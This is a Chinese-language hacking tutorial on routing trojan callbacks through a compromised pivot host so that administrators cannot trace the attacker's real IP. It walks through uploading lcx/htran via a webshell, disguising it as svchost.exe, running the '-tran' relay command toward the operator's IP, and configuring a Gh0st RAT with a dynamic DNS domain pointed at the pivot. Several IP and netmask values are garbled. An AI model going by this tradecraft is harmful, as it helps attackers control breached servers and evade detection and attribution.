我们都知道，在做渗透测试时，为了安全，都会先挂上代理（如VPN、SOCKS5等），再去开始我们的活动。越是危险的目标，所需要的代理也越多，有时候甚至需要3重以上的跳板才能保证相对的安全。但是有一种工具却是无法在常规代理下工作的，那就是——木马。

大多数情况下，我们在服务器上开启的VPN分配给每个连接客户端的都是自己定义的IP段，比如169.254.1.0/24之类的，这些lP在外网是无法访问的，也就是说木马无法通过你VPN的地址来上线。比如危险漫步拨上自己的VPN，内网地址便是169.254.1.8。

我们知道，169.254.0.0/161IP段是保留地址，是当网卡为DHCP模式获取不到IP地址时系统所分配的地址，所以在公网是绝对无法访问该IP的。那么如果此时我在目标服务器上种了木马，上线地址就只能填自己的真实IP。可是这样一来，管理员不是很容易就发现了你的真实IP吗？你之前所做的一切伪装．所连接的所有跳板都是白费力气。

可是，就真的没有办法隐藏自己吗？能不能即连接VPN木马又能上线呢？有！答案就是跳板上线。

何谓跳板上线？普通上线方式是木马服务端直接反向连接到我们的上线地址，那么跳板上线就是木马先经过一个跳板，然后再连接到我们的真实lP。跳板上线时被控服务器上所显示的连接IP是跳板的lP地址，就算被管理员发现了也不会暴露我们的真实IP（听起来是不是和我们所拨的VPN有一点像，只是这时候是反向连接的）。

“其中，跳板可以不止一级，可以有很多级，但是相应的，跳板越多数据传输也就会越慢，木马的响应时间也会越长。下面我们来看跳板上线具体怎么操作。首先需要的工具是lcx也就是htran，我们之需要用到其中的数据转发功能。

实际用时，我们需要输入的命令是：Lcx -tran 443 123.234.56.7880

其中443是木马的上线端口，123.234\56.78是我们的真实IP，80是木马客户端所监听的端口。

然后除了lcx我们还需要一个可以执待命令的webshell，对，你没有看错，一个webshell就足够！

我们不需要有系统的管理员权限，在webshell上就可以运行lcx。 我们先用菜刀把lcx传上去，为了隐蔽，改名字为svchost.exe。然后在虚拟终端中运行之前的命令：Svchost -tran 443真实IP 80。

由于lcx会一直运行，所以会导致菜刀提示运行失败，但是事实上已经运行成功了。

这时候配好木马，危险漫步选用测试木马为GhOst3.6，上线地址最好为动态域名，这样方便以后更换跳板，这里配置域名为twilight．3322.org。同时，还需要将该动态域名的映射地址改为跳板地址。这时候，就可以在目标服务器上运行木马了，七夕哥在虚拟机里进行测试，虚拟机是2003的系统，运行木马后等待上线就可以了。我们在虚拟机里面运行netstat -an进行查看，可以看到只有一条连接，连向跳板的IP地址，完全的隐藏了我们自身的IP地址。当需要结束连接时，我们只需要在菜刀里运行netstat -ano I find”：443”，找到我们监听443端口的进程pid，将其结束掉就可以了。这里只演示了一个跳板的情况，相应的，我们可以增加到二级、三级甚至更多。